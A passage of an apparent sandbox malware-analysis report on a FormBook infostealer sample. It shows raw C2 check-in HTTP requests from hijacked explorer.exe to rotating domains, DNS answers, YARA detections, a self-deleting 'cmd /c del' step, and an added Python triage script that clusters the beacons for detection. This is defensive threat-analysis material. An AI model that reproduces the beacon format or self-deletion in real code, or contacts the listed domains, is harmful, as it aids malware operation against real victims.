2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be b3 fd a3 ac d2 d1 b8 fc b8 c4 c3 fb b3 c6 bb f2 d5 df d4 dd ca b1 b2 bb bf c9 d3 c3 a1 a3 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d
                                               Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - [GB2312 text, decoded from the raw bytes above: File or directory not found.]</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>[GB2312: Server Error]</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - [GB2312: File or directory not found.]</h2> <h3>[GB2312: The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.]</h3> </fieldset></div></div></body></htm


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                               3 | 192.168.2.7 | 49843 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                               Timestamp | kBytes transferred | Direction | Data
                                               Jan 28, 2022 10:48:06.312361002 CET | 18010 | OUT | GET /b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9 HTTP/1.1
                                              Host: www.farmacymerchants.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                               Jan 28, 2022 10:48:06.427875042 CET | 18011 | IN | HTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Fri, 28 Jan 2022 09:48:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "61f22041-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
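The DNS answers and the four HTTP sessions above carry the whole signature of a FormBook check-in: a bare GET from the hollowed explorer.exe with only Host and Connection: close, no User-Agent, a fixed path (/b80i/), a first query parameter that is unescaped base64 of the same length every time, and a fixed trailing token (3f9LV=d484gh1H9), repeated against a rotating list of unrelated domains of which several never resolve. The script below is an added example, not code from the Joe Sandbox report; it rebuilds those records as constructed input and shows how an analyst would cluster such requests and correlate them with the DNS answers. INJECTION_TARGETS and MIN_BLOB_BYTES are assumptions, not values taken from the report. The clustering is written generally, so it also works on a capture with several paths or several samples, which the report's four sessions alone do not show.

```python
"""Triage FormBook-style HTTP check-ins from sandbox DNS and HTTP records.

Added example, not code from the Joe Sandbox report. The records below are constructed
from the report's DNS answer table and its four HTTP sessions; INJECTION_TARGETS and
MIN_BLOB_BYTES are assumptions rather than values taken from the report."""
import base64
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed from the report's DNS answers: (query name, reply code, final A record).
DNS_ANSWERS = [
    ("www.inslidr.com", 3, None), ("www.carriewilliamsinc.com", 0, "34.102.136.180"),
    ("www.gooooooo.xyz", 0, "148.72.244.75"), ("www.yixuan5.com", 0, "156.246.248.162"),
    ("www.farmacymerchants.com", 0, "34.102.136.180"), ("www.ehaszthecarpetbagger.com", 3, None),
    ("www.freelance-rse.com", 0, "193.141.3.66"), ("www.nbjcgl.com", 3, None),
    ("www.wildberryhair.com", 0, "172.67.168.28"), ("www.micorgas.com", 0, "35.186.238.101"),
    ("www.postmoon.xyz", 3, None),
]

def _request(host, blob):  # rebuilds one of the report's GET requests as constructed sample input
    return f"GET /b80i/?Tjox={blob}&3f9LV=d484gh1H9 HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"

# (client process, raw request) for the four sessions the report shows from explorer.exe.
HTTP_REQUESTS = [("C:\\Windows\\explorer.exe", _request(h, b)) for h, b in [
    ("www.carriewilliamsinc.com", "OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg=="),
    ("www.gooooooo.xyz", "RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ=="),
    ("www.yixuan5.com", "uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg=="),
    ("www.farmacymerchants.com", "shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q=="),
]]

# Assumption: system binaries that never issue bare HTTP GETs on their own in this environment.
INJECTION_TARGETS = {"explorer.exe", "control.exe"}
MIN_BLOB_BYTES = 32  # assumption: smallest decoded size treated as an encrypted check-in blob
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def decoded_b64_len(value):
    """Decoded length if value is well-formed, unescaped standard base64, else None."""
    if not B64_RE.match(value) or len(value) % 4:
        return None
    try:
        return len(base64.b64decode(value, validate=True))
    except ValueError:  # binascii.Error is a ValueError
        return None

def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into method, path, ordered query pairs and headers."""
    request_line, *header_lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    # Split the query by hand: parse_qsl would turn the unescaped '+' of base64 into spaces.
    query = [tuple(kv.split("=", 1)) if "=" in kv else (kv, "") for kv in parts.query.split("&") if kv]
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": parts.path, "query": query, "headers": headers,
            "blob_len": decoded_b64_len(query[0][1]) if query else None}

def beacon_indicators(process, req):
    """Per-request tells of a FormBook-style check-in; returns the set that fired."""
    hits, h = set(), req["headers"]
    if "user-agent" not in h:
        hits.add("no-user-agent")
    if set(h) <= {"host", "connection"}:
        hits.add("minimal-headers")  # only Host and Connection: close; no browser sends so little
    if req["method"] == "GET" and (req["blob_len"] or 0) >= MIN_BLOB_BYTES:
        hits.add("base64-blob-in-query")  # first parameter is unescaped base64 ('+', '/', '=' raw)
    if process.rsplit("\\", 1)[-1].lower() in INJECTION_TARGETS:
        hits.add("injection-target-client")
    return hits

def triage(dns_answers, http_requests):
    """Cluster requests on (path, fixed trailing parameter) and correlate with the DNS answers."""
    clusters = defaultdict(lambda: {"hosts": set(), "indicators": set(), "blob_lengths": set()})
    contacted = set()
    for process, raw in http_requests:
        req = parse_http_request(raw)
        host = req["headers"].get("host", "")
        contacted.add(host)
        c = clusters[(req["path"], "=".join(req["query"][-1]) if req["query"] else "")]
        c["hosts"].add(host)
        c["indicators"] |= beacon_indicators(process, req)
        c["blob_lengths"] |= {req["blob_len"]} - {None}
    resolved, nxdomain, by_ip = set(), set(), defaultdict(set)
    for name, rcode, addr in dns_answers:
        if rcode == 3:
            nxdomain.add(name)
        elif addr:
            resolved.add(name)
            by_ip[addr].add(name)
    # One path and trailing token reused against unrelated domains is the domain-rotation
    # pattern of a C2 check-in, not four different web applications.
    return {
        "clusters": {k: {"hosts": sorted(v["hosts"]), "indicators": v["indicators"], "blob_lengths": v["blob_lengths"]}
                     for k, v in clusters.items() if len(v["hosts"]) >= 2},
        "nxdomain": sorted(nxdomain),  # names from the configuration that never resolved
        "resolved_not_contacted": sorted(resolved - contacted),
        "shared_ips": {ip: sorted(n) for ip, n in by_ip.items() if len(n) >= 2},
    }
```

On the report's data, triage() yields one cluster, ("/b80i/", "3f9LV=d484gh1H9"), spanning all four contacted hosts with every indicator fired and a single decoded blob length (55 bytes for each request), four NXDOMAIN names, three names that resolved without an HTTP session in the capture, and one address (34.102.136.180) shared by two of the domains. A 403 or 404 from a host does not clear it: FormBook walks the domain list from its configuration, most of which are unrelated to the operator, so the path and token cluster, not any single host's reply, is the indicator worth alerting on.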



                                              Target ID:0
                                              Start time:10:46:03
                                              Start date:28/01/2022
                                              Path:C:\Users\user\Desktop\5tCYPTkM6b.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\5tCYPTkM6b.exe"
                                              Imagebase:0x400000
                                              File size:254186 bytes
                                              MD5 hash:C2CA2BA9C38EB02217588662717BA6C3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Target ID:2
                                              Start time:10:46:07
                                              Start date:28/01/2022
                                              Path:C:\Users\user\Desktop\5tCYPTkM6b.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\5tCYPTkM6b.exe"
                                              Imagebase:0x7ff724940000
                                              File size:254186 bytes
                                              MD5 hash:C2CA2BA9C38EB02217588662717BA6C3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Target ID:4
                                              Start time:10:46:12
                                              Start date:28/01/2022
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff662bf0000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              Target ID:14
                                              Start time:10:46:36
                                              Start date:28/01/2022
                                              Path:C:\Windows\SysWOW64\control.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\control.exe
Imagebase: 0x840000
File size: 114688 bytes
MD5 hash: 40FBA3FBFD5E33E0DE1BA45472FDA66F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

Target ID: 15
Start time: 10:46:41
Start date: 28/01/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe"
Imagebase: 0x870000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 16
Start time: 10:46:42
Start date: 28/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

No disassembly